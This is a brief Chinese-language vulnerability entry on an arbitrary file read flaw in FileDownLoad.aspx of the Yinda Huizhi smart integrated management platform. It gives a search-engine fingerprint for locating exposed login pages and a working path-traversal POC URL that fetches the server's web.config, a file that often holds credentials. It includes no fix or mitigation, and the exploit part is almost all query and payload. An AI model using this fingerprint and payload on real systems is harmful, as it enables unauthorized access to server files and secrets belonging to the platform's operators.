# 银达汇智智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞

# 漏洞描述

银达汇智智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞，通过漏洞攻击者可下载服务器中的任意文件

银达汇智智慧综合管理平台

"汇智信息" && title="智慧综合管理平台登入"

登陆页面

验证POC

http://xxx.xxx.xxx.xxx/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config